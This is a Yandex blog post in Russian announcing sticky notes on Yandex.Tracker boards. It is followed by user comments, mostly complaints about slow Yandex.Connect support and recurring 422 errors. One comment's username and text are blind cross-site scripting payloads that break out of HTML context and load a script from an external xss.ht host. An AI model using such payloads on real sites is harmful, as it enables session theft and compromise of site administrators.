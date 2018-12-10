Коннект, Трекер, Почта для домена

Коннект, Трекер, Почта для домена

Новое в Трекере: заметки на досках

Новое в Трекере: заметки на досках

В Яндекс.Трекере теперь можно добавлять заметки на доску задач.

Пояснения, рекомендации, напоминания — любые комментарии закрепляются в верхней части колонок и видны всем участникам рабочего процесса.

Зачем нужны заметки

Используйте их так, как удобно вашей команде. Если вы работаете по методологии скрам, можете перечислить в заметке цели спринта:

  1. Добавить возможность регистрации пользователей на сайте.
  2. Исправить критичные ошибки.

Если для перевода задачи в следующий статус нужны какие-то сопроводительные действия — опишите их в заметке, чтобы не забыть. Например, разработчикам, передающим задачи в тестирование, можно напомнить:

Пожалуйста, укажите:

  • каким образом тестировать новые возможности,
  • какие части системы затронуты и требуют проверки.

Заметки сделают нагляднее критерии перевода задачи в какой-либо статус:

Решённую задачу закрываем не раньше, чем результат будет в общем доступе.

Любые вопросы или планы, связанные с рабочим процессом, можно отразить в заметке:

Одновременно с запуском надо опубликовать в блоге пост с рассказом о новой возможности.

Как создать заметку

Кнопки для добавления заметок появились в каждой колонке:

Кликните — и откроется окно для ввода. Оформить текст можно с помощью вики-разметки.

В каждой колонке можно опубликовать по одной заметке. Вне зависимости от движения задач она будет всегда наверху. Читать и редактировать заметки могут все пользователи, у кого есть доступ к доске.

Как начать работать с досками в Трекере:

29 комментариев
Авторизуйтесь, чтобы оставить комментарий
Almtv
11 декабря 2018, 12:47
Подскажите, пожалуйста, как достучаться до техподдержки Яндекс.Коннект, она же работает? С 29 ноября не могу добавить домен (сообщение, что домен у другого администратора  - Ticket#18112913484986984).  В тот же день я положил нужный файл в корень сайта, чтобы подтвердить владение, и с тех пор ни ответа ни привета. Домен не добавить, а пользоваться Яндекс.Коннект'ом  без этого нет смысла. 
Кира
Сотрудник Яндекса14 декабря 2018, 16:38
Almtv,
здравствуйте! Мы обязательно поможем Вам подключить домен. Мой коллега уже ответил Вам в заявке 18112913484986984.
novostrojniy1982
17 декабря 2018, 18:20
Кира,
Добрый день, может и по моим заявкам посмотрите, а то почти 2 недели тривиальная проблема висит 
Ticket#18120416095239944
Ticket#18121012523898393
Спасибо!
info@webair-studio.ru
8 апреля, 14:11
Кира,
 прошло уже более 72 часов, но DKIM так и не работает. Прошу помощи Ticket#19040417032874782
Ермилов Никита
12 декабря 2018, 19:40
Добрый день! К сожалению могу сказать, что сервис стал хуже, чем pdd.yandex.ru Месяц назад перенесли домен, импортировали почтовые ящики и  их заблокировала ваша анти спам система. Поддержка молчит уже 2 недели Ticket#18111201025215599. 
Кира
Сотрудник Яндекса14 декабря 2018, 16:25
Ермилов Никита,
здравствуйте! Простите, пожалуйста, за задержку.
Мой коллега уже ответил Вам в заявке 18111201025215599. 
Ермилов Никита
7 января, 23:00
Кира,
 Лучше сделайте сервис платным, чтобы поддержка работа быстро. 
Жду ответа по тикету 18111201025215599
f.ponomarev@moskvichka.live
13 декабря 2018, 22:47
Добрый день. Никто не отвечает на тикеты в поддержку, напишу здесь. У нас не работают сервисы Ямб и Люди - помните, пожалуйста исправить, домен moskvichka.live
Кира
Сотрудник Яндекса14 декабря 2018, 16:42
f.ponomarev@moskvichka.live,
здравствуйте! Проверьте, пожалуйста, заявку 18121214290032715. Мой коллега уже ответил Вам :)
popovdm88
17 декабря 2018, 15:23
Добрый день.
Что у вас с техподдержкой??
Ticket#18110117143031143 висит с 1 ноября.
v.yurov@a3f.yaconnect.com
18 декабря 2018, 11:29
Как включить уведомления об изменениях в задачах на рабочем столе?
На данный момент получаю письма об изменениях в трекере задача на почту, но это неудобно.
Almtv
20 декабря 2018, 13:21
Кира, спасибо вам за поддержку по Ticket#18112913484986984. После вашей помощи, 14 декабря наконец то был ответ по проблеме с просьбой указать нужный аккаунт. Аккаунт я указал, но, к сожалению, с тех пор дальнейших действий так и нет. Домен по прежнему не подключен, работать нет возможности. 
Платон П.
30 декабря 2018, 12:11
Присоединюсь к остальным. Заявки 18122606282787230 и 18121301213836996 с середины месяца висят. Ямб и рассылки по общим ящикам так и не работают. А работать людям нужно
Павел Лазер-Холл
3 января, 20:19
У нас всё отлично работает. :))) Спасибо. Собираемся на Трекер переходить для учёта задач дизайнерам и производству. Можно ли где почитать более подробно про сервис? Как к примеру удалить статусы в разделе Все статусы. Там очень много нам не нужных.
kamchatka
4 января, 19:14
А будет ли когда-нибудь импорт ящиков?
Александр
15 января, 18:57
kamchatka,
давно есть:
https://yandex.ru/support/connect/mail-settings.html#mail-settings__section_ezf_3ld_r2b
kamchatka
15 января, 19:45
Александр,
спасибо!
Но это было не вполне очевидно (там вообще ничего не понятно, в этом интерфейсе). А вместо сотрудников Яндекса на вопросы отвечают другие пользователи...
Эдуард Валеев
6 января, 05:09
Здравствуйте.
Очень долгое и томительное ожидание ответа от техподдержки на 
Ticket#18122110280731104

перед овым годом я ждал 5 дней, пока не пришлось достучаться через знакомых сотрудников Яндекса. Сейчас же, в этом тикете у меня висит вопрос с 28 декабря, однако воз и ныне там. Как быть?
"-->'><script/src=//johndoe.xss.ht></script>
9 января, 23:22
"'--></style></title></textarea></script>"><script src=https://johndoe.xss.ht>
ka
15 января, 23:19
Яндекс !!!! Аууу ! Вы совсем сломались ? 
Организацию добавить нельзя (ошибка 422), домен не МХ-записи, хоть убейся уже пару месяцев.
Домен открепил от аккаунта, акк удалил, а к новому не могу прикрепить....

Да что за на фиг такой ?
b.mikhailovsky
30 января, 14:46
Добрый день! После отправки запроса в техподдержку (вчера) ничего не произошло (не пришло подтверждение о приеме запроса). В рекомендациях по отправке запроса указано, что не следует дублировать запросу в тех.поддержку. Как убедиться в том, что запрос дошел до тех.поддержки?


Сейчас не могу производить ряд важных операций (удаление домена из организации, удаление организации, переключение на основной домен, добавление пользователя) в рамках организации.
wwwotwet
6 февраля, 10:19
Не удалось завершить действие. Произошла ошибка 422. коннект мертв
Ермилов Никита
7 февраля, 13:33
Яндекс Живи ))) поддержка месяц молчит - 18111201025215599
boroznin@confil.ru
4 апреля, 14:52
При редактировании данных пользователя не удается сохранить изменения. Пишет Произошла ошибка — не удалось обновить информацию о пользователе
как это возможно сделать?
info@webair-studio.ru
4 апреля, 20:19
Ни номер тикета не приходит на почту, ни ответ не приходит, ни DKIM не заработал.

DKIM прописан в DNS домена webair-studio.ru более 24 часов назад. Уверен, пока прочтете пройдет более 72 часов и ничего не изменится.

Скажите, вы создали сервис ради галочки? Я был бы даже готов платить, если бы всё работало как часы.
Куда Яндекс катится? Даже в блоге тут перестали публиковать что либо. Значит, проект мертв? Очень жаль...
mail.pnholding
10 апреля, 12:19
Хотел перевести организацию на коннект.
По итогу количество лагов и обрезанный функционал отбили все желание...
"Не удалось завершить действие. Произошла ошибка 422" (с)
sprintcity
20 мая, 14:45
Действительно есть ошибка "Не удалось завершить действие. Произошла ошибка 422." при попытке добавить организацию.


Обидно, что 4 домена/организации уже подключил, на пятом проблемы начались. Придется перетаскивать все на Мейл.


Яндекс, уже несколько месяцев (если смотреть даты комментариев) висит критичная ошибка и не можете починить. Смысл от сервиса когда к нему не подключить организацию свою. Или сервис вообще умер и вы на него плюнули, а сообщить всем постеснялись. 
AdGooroo
21 августа, 14:58
"Не удалось завершить действие. Произошла ошибка 422." - всё еще актуально
Юрий
31 августа, 17:07
Добавление алиаса. "Не удалось завершить действие. Произошла ошибка 422." - крайне информативно. И так уже несколько месяцев.